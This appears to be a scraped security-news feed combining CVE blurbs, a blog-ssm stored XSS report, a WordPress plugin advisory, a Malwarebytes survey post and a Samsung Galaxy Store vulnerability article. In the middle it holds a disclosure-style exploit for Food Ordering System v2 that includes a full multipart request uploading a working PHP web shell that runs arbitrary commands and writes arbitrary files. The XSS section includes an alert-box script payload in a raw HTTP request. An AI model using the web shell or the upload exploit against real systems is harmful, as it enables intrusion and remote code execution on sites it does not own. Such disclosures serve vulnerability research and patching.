Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability

CVE-2023-21795

CVE-2023-21796

Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21795.

Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability.

CVE-2023-21775

Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability

Cross-Site Scripting (XSS) vulnerability found in Rawchen blog-ssm v1.0 allows attackers to execute arbitrary code via the 'notifyInfo' parameter.

**Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') In /comment****\[Suggested description\]**

blog-ssm v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /comment. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the notifyInfo parameter.

**\[Vulnerability Type\]**

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

**\[Vendor of Product\]**

https://github.com/rawchen/blog-ssm

**\[Affected Product Code Base\]**

1.0

**\[Affected Component\]**

blog-ssm 1.0

OS: Windows/Linux/macOS

Browser: Chrome、Firefox、Safari

**\[Attack Vector\]****Step1:Registered account, username: text123, password: 123456.**

**Step2:Log in to the account you just registered and click "File Management".**

**Step3:Click any article on the homepage and enter malicious Javascript code in the comment area.**

**Data Pack:**

POST /comment HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/articles/blog-ssm
Cookie: JSESSIONID=F68B6E11EB57F40C26C413029E832793
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

contentId=65&commentText=%3Cscript%3Ealert%28%22123%22%29%3C%2Fscript%3E

**Step4:Visit the article again to trigger a stored XSS attack.**

**\[Attack Type\]**

Remote

**\[Impact Code execution\]**

True

**\[Reference(s)\]**

https://cwe.mitre.org/data/definitions/79.html

CVE-2022-40034: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') In /comment · Issue #4 · rawchen/blog-ssm

The My YouTube Channel plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the clear_all_cache function in versions up to, and including, 3.0.12.1. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to clear the plugin's cache.

CVE-2023-0447: Changeset 2844200 for youtube-channel – WordPress Plugin Repository

Food Ordering System version 2 suffers from a remote shell upload vulnerability.

## Title: Food Ordering System v2 File upload Vulnerability + web-shell upload - RCE## Author: nu11secur1ty## Date: 01.23.2023## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Food-Ordering-System-v2.0## Description:The Food Ordering System v2 suffers from, File Upload and web-shellupload RCE Vulnerabilities.The upload function for the background image hover of this system isnot sanitizing correctly.The attacker can upload some RCE malicious code and easily destroythis system. The status of this system is awful!## STATUS: HIGH Vulnerability[+] Exploit:```GETPOST /fos/admin/ajax.php?action=save_settings HTTP/1.1Host: pwnedhost.comContent-Length: 6157Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryqYQLHPx3VuntGH7WOrigin: http://pwnedhost.comReferer: http://pwnedhost.com/fos/admin/index.php?page=site_settingsAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=598nahp235ehmk2broafrh37qqConnection: close------WebKitFormBoundaryqYQLHPx3VuntGH7WContent-Disposition: form-data; name="name"Online Food Ordering System V2------WebKitFormBoundaryqYQLHPx3VuntGH7WContent-Disposition: form-data; name="email"info@sample.com------WebKitFormBoundaryqYQLHPx3VuntGH7WContent-Disposition: form-data; name="contact"+6948 8542 623------WebKitFormBoundaryqYQLHPx3VuntGH7WContent-Disposition: form-data; name="about"<p style="text-align: center; background: transparent; position:relative;"><span style="font-size:28px;background: transparent;position: relative;">ABOUT US</span></b></span></p><pstyle="text-align: center; background: transparent; position:relative;"><span style="background: transparent; position: relative;font-size: 14px;"><span style="font-size:28px;background: transparent;position: relative;"><b style="margin: 0px; padding: 0px; color:rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif;text-align: justify;">Lorem Ipsum</b><span style="color: rgb(0, 0, 0);font-family: "Open Sans", Arial, sans-serif; font-weight:400; text-align: justify;">&nbsp;is simply dummy text of the printingand typesetting industry. Lorem Ipsum has been the industry&#x2019;sstandard dummy text ever since the 1500s, when an unknown printer tooka galley of type and scrambled it to make a type specimen book. It hassurvived not only five centuries, but also the leap into electronictypesetting, remaining essentially unchanged. It was popularised inthe 1960s with the release of Letraset sheets containing Lorem Ipsumpassages, and more recently with desktop publishing software likeAldus PageMaker including versions of LoremIpsum.</span><br></span></b></span></p><p style="text-align: center;background: transparent; position: relative;"><span style="background:transparent; position: relative; font-size: 14px;"><spanstyle="font-size:28px;background: transparent; position:relative;"><span style="color: rgb(0, 0, 0); font-family: "OpenSans", Arial, sans-serif; font-weight: 400; text-align:justify;"><br></span></b></span></p><p style="text-align: center;background: transparent; position: relative;"><span style="background:transparent; position: relative; font-size: 14px;"><spanstyle="font-size:28px;background: transparent; position:relative;"><h2 style="font-size:28px;background: transparent;position: relative;">Where does it come from?</h2><pstyle="text-align: center; margin-bottom: 15px; padding: 0px; color:rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif;font-weight: 400;">Contrary to popular belief, Lorem Ipsum is notsimply random text. It has roots in a piece of classical Latinliterature from 45 BC, making it over 2000 years old. RichardMcClintock, a Latin professor at Hampden-Sydney College in Virginia,looked up one of the more obscure Latin words, consectetur, from aLorem Ipsum passage, and going through the cites of the word inclassical literature, discovered the undoubtable source. Lorem Ipsumcomes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum etMalorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC.This book is a treatise on the theory of ethics, very popular duringthe Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sitamet..", comes from a line in section1.10.32.</p></span></b></span></p>------WebKitFormBoundaryqYQLHPx3VuntGH7WContent-Disposition: form-data; name="img"; filename="pic.php"Content-Type: image/jpeg<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><html>  <head>    <meta http-equiv="Content-Type" content="text/html" charset="euc-kr">    <title>PHP Web Shell Ver 4.0 by nu11secur1ty</title>    <script type="text/javascript">      function FocusIn(obj)      {        if(obj.value == obj.defaultValue)          obj.value = '';      }            function FocusOut(obj)      {        if(obj.value == '')          obj.value = obj.defaultValue;      }    </script>  </head>  <body>    <b>WebShell's Location = http://<?php echo $_SERVER['HTTP_HOST'];echo $_SERVER['REQUEST_URI'] ?></b><br><br>        HTTP_HOST = <?php echo $_SERVER['HTTP_HOST'] ?><br>    REQUEST_URI = <?php echo $_SERVER['REQUEST_URI'] ?><br>        <br>        <form name="cmd_exec" method="post" action="http://<?php echo$_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?>">      <input type="text" name="cmd" size="70" maxlength="500"value="Input command to execute"onfocus="FocusIn(document.cmd_exec.cmd)"onblur="FocusOut(document.cmd_exec.cmd)">      <input type="submit" name="exec" value="exec">    </form>    <?php      if(isset($_POST['exec']))      {        exec($_POST['cmd'],$result);        echo '----------------- < OutPut > -----------------';        echo '<pre>';        foreach($result as $print)        {          $print = str_replace('<','<',$print);          echo $print . '<br>';        }        echo '</pre>';      }      else echo '<br>';    ?>        <form enctype="multipart/form-data" name="file_upload" method="post"action="http://<?php echo $_SERVER['HTTP_HOST']; echo$_SERVER['REQUEST_URI'] ?>">      <input type="file" name="file">      <input type="submit" name="upload" value="upload"><br>      <input type="text" name="target" size="100" value="Location wherefile will be uploaded (include file name!)"onfocus="FocusIn(document.file_upload.target)"onblur="FocusOut(document.file_upload.target)">    </form>    <?php      if(isset($_POST['upload']))      {        $check = move_uploaded_file($_FILES['file']['tmp_name'], $_POST['target']);                if($check == TRUE)          echo '<pre>The file was uploaded successfully!!</pre>';        else          echo '<pre>File Upload was failed...</pre>';      }    ?>  </body></html>------WebKitFormBoundaryqYQLHPx3VuntGH7W--```[+] Response:```HTTPHTTP/1.1 200 OKDate: Mon, 23 Jan 2023 12:27:44 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0X-Powered-By: PHP/8.2.0Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 1Connection: closeContent-Type: text/html; charset=UTF-81```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Food-Ordering-System-v2.0)## Reference:[href](https://portswigger.net/web-security/file-upload)## Proof and Exploit:[href](https://www.youtube.com/watch?v=t7RnRFnXTP4)## Proof and Exploit:[href](https://streamable.com/c026hq)## Time spent`01:00:00`

Food Ordering System 2 Shell Upload

Categories: Business
We asked 250 schools and hospitals about their mobile security posture, including Chromebooks. Here’s what we found out. 



(Read more...)




The post Key takeaways from Malwarebytes 2023 State of Mobile Cybersecurity appeared first on Malwarebytes Labs.

The results of our latest survey on mobile cybersecurity in K-12 and hospitals are in—and it’s not all peaches and roses.

When we talk about endpoint protection, it’s only natural to only think about the most commonly compromised endpoints like work laptops and servers—but your smartphone isn’t off the hook.

There are plenty of risks associated with mobile devices, and we ignore them at our peril. In 2020 alone, almost 50% of organizations had at least one employee download a malicious mobile application that threatened their organization’s network and data.

Certain industries such as education and healthcare face their own distinct set of challenges when it comes to mobile security, namely a diverse amount of endpoints and lackluster budgets and infrastructure.

To better understand the mobile security landscape, we asked 250 schools and hospitals about their mobile security posture (including Chromebooks). The average organization surveyed was based in North America and had anywhere from 250 to over 5000 endpoints.

Here’s some key takeaways.

**45% of schools reported that at least one cybersecurity incident last year started with Chromebooks or other mobile devices**

**Almost 30% of schools and hospitals aren’t protecting mobile devices with their current endpoint protection solution**

**77% of organizations are confident in their ability to protect mobile devices, including Chromebooks, from cybersecurity threats**

**Chromebooks and employee devices rank top among schools' riskiest attack surfaces**

**63% of organizations say cost is their biggest concern for their current mobile security tools**

**58% of organizations' cybersecurity budgets are the same compared to 2022**

**Mobile security for resource-constrained organizations**

Don't let mobile and Chromebook threats catch you off guard in 2023.

Malwarebytes 2023 State of Mobile Cybersecurity showed that while most organizations may be confident in their mobile security posture, almost a third aren't currently protecting their mobile endpoints and close to half have experienced a cybersecurity incident due to a mobile device or Chromebook in 2022.

Needless to say, today's organizations and public sector institutions need to protect a growing number of mobile endpoints, including Chromebooks.

Enter Malwarebytes Mobile Security for Business, which extends our award-winning endpoint protection to mobile devices. Tailor-made for organizations with resource constraints, IT teams can conveniently manage protection across Chrome OS, Android and iOS devices from the same cloud-native console monitoring their servers, workstations, and laptops.

Learn more about mobile security and why it's important and check out our blog posts "Improving security for mobile devices: CISA issues guides" and "Do Chromebooks need antivirus protection?" for more tips on improving your organizations mobile and Chromebook security posture.

Stay vigilant! 

**Related articles**

*   5 must-haves for K-12 cybersecurity
*   5 Essential security tips for small businesses
*   Case study: IntraHealth International boosts ransomware immunity
*   White paper: Malwarebytes best-informed telemetry: Unmatched threat visibility
*   What is password manager?

Key takeaways from Malwarebytes 2023 State of Mobile Cybersecurity

Two security flaws have been disclosed in Samsung's Galaxy Store app for Android that could be exploited by a local attacker to stealthily install arbitrary apps or direct prospective victims to fraudulent landing pages on the web.
The issues, tracked as CVE-2023-21433 and CVE-2023-21434, were discovered by NCC Group and notified to the South Korean chaebol in November and December 2022. Samsung

Mobile Hacking / App Security

Two security flaws have been disclosed in Samsung's Galaxy Store app for Android that could be exploited by a local attacker to stealthily install arbitrary apps or direct prospective victims to fraudulent landing pages on the web.

The issues, tracked as **CVE-2023-21433 and CVE-2023-21434**, were discovered by NCC Group and notified to the South Korean chaebol in November and December 2022. Samsung classified the bugs as moderate risk and released fixes in version 4.5.49.8 shipped earlier this month.

Samsung Galaxy Store, previously known as Samsung Apps and Galaxy Apps, is a dedicated app store used for Android devices manufactured by Samsung. It was launched in September 2009.

The first of the two vulnerabilities is CVE-2023-21433, which could enable an already installed rogue Android app on a Samsung device to install any application available on the Galaxy Store.

Samsung described it as a case of improper access control that it said has been patched with proper permissions to prevent unauthorized access.

It's worth noting here that the shortcoming only impacts Samsung devices that are running Android 12 and before, and does not affect those that are on the latest version (Android 13).

The second vulnerability, CVE-2023-21434, relates to an instance of improper input validation occurring when limiting the list of domains that could be launched as a WebView from within the app, effectively enabling a threat actor to bypass the filter and browse to a domain under their control.

"Either tapping a malicious hyperlink in Google Chrome or a pre-installed rogue application on a Samsung device can bypass Samsung's URL filter and launch a webview to an attacker controlled domain," NCC Group researcher Ken Gannon said.

The update comes as Samsung rolled out security updates for the month of January 2023 to remediate several flaws, some of which could be exploited to modify carrier network parameters, control BLE advertising without permission, and achieve arbitrary code execution.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#chrome